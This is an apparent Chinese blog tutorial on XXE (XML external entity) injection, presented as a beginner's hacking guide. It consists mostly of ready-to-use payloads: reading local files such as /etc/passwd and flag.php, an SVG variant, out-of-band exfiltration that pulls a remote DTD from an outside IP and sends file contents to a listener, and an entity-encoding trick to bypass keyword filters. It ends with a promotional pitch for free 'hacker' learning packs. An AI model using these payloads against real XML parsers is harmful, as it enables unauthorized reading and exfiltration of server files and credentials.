渗透攻击零基础学习-XXE(非常详细)零基础入门到精通,收藏这一篇就够了

XXE

XXE ( PHP 5.45之后不解析实体 )

<!DOCTYPE 根标签名 SYSTEM "文件名">  

DTD实体是用于定义引用文本或字符的快捷方式的变量,可内部声明或外部引用。

约束通过类别关键词 ANY 声明的元素,可包含任何可解析数据的组合:

<!ELEMENT 标签名 ANY>  

同时xxe可进行内网探测读取 /etc/hosts

Payload

PHP文件读取

<?xml version="1.0" encoding="utf-8"?>   
<!DOCTYPE xxe [  
<!ELEMENT name ANY>  
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php">]>  
<creds>  
<user>&xxe;</user>  
</creds>

file协议读取文件

<?xml version="1.0"?>  
<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>  
<catalog>  
    	<core id="test101">  
     		<description>&xxe;</description>  
  		</core>  
</catalog>

SVG格式

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE note [  
<!ENTITY file SYSTEM "要读取的文件路径" >  
]>  
<svg height="100" width="1000">  
  		<text x="10" y="20">&file;</text>  
</svg>

数据外带

<!DOCTYPE root [   
<!ENTITY % remote SYSTEM "http://174.1.66.167/shell.dtd">  
%remote;  
]>  
  
shell.dtd  
<!ENTITY % file SYSTEM "file:///flag">  
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://127.0.0.1:5555/?flag=%file;'>">  
%int;  
%send;

xxe绕过的payload

当只过滤了SYSTEM,PUBLIC等关键字时,可用双重实体编码绕过

<?xml version="1.0"?>  
  
<!DOCTYPE GVI [  
  
    <!ENTITY % xml "&#60;&#33;&#69;&#78;&#84;&#73;&#84;&#89;&#32;&#120;&#120;&#101;&#32;&#83;&#89;&#83;&#84;&#69;&#77;&#32;&#34;&#102;&#105;&#108;&#101;&#58;&#47;&#47;&#47;&#102;&#108;&#97;&#103;&#46;&#116;&#120;&#116;&#34;&#32;&#62;&#93;&#62;&#10;&#60;&#99;&#111;&#114;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#109;&#101;&#115;&#115;&#97;&#103;&#101;&#62;&#38;&#120;&#120;&#101;&#59;&#60;&#47;&#109;&#101;&#115;&#115;&#97;&#103;&#101;&#62;&#10;&#60;&#47;&#99;&#111;&#114;&#101;&#62;">  
  
    %xml;

即为在xml实体中再定义一次xml,可成功被解析,支持dtd数据外带

<!ENTITY xxe SYSTEM "file:///flag.txt" >]>  
<core>  
      <message>&xxe;</message>  
</core>

以上为编码部分内容

为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值